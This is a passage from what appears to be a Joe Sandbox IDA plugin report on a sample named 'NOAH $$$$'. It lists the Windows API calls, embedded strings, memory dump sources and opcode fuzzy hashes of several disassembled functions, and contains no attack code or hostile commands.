                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 956284711-4108050209
                                                                                                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 1965227024-3771769585
                                                                                                                                        • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                                        • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$_memmove_wcslen
                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                        • API String ID: 369157077-1007645807
                                                                                                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32 ref: 00445BF8
                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                        • API String ID: 3125838495-3381328864
                                                                                                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CharNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1350042424-0
                                                                                                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                        • API String ID: 3052893215-2127371420
                                                                                                                                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 2295938435-2354261254
                                                                                                                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                                        • API String ID: 3038501623-2263619337
                                                                                                                                        • Opcode ID: c1d1e427df81d364f3e7315beb2c85998febd91a9edec5b390063b37ecf0eef7
                                                                                                                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                                        • Opcode Fuzzy Hash: c1d1e427df81d364f3e7315beb2c85998febd91a9edec5b390063b37ecf0eef7
                                                                                                                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 2295938435-8599901
                                                                                                                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 00443B67
                                                                                                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                        • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                        • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                        • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                                                        • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                        • String ID: BUTTON
                                                                                                                                        • API String ID: 1834419854-3405671355
                                                                                                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • _wprintf.LIBCMT ref: 00454074
                                                                                                                                        • __swprintf.LIBCMT ref: 004540A3
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                        • API String ID: 455036304-4153970271
                                                                                                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                        • _memmove.LIBCMT ref: 00467EB8
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                        • _memmove.LIBCMT ref: 00467F6C
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2170234536-0
                                                                                                                                        • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                                                                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                                        • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
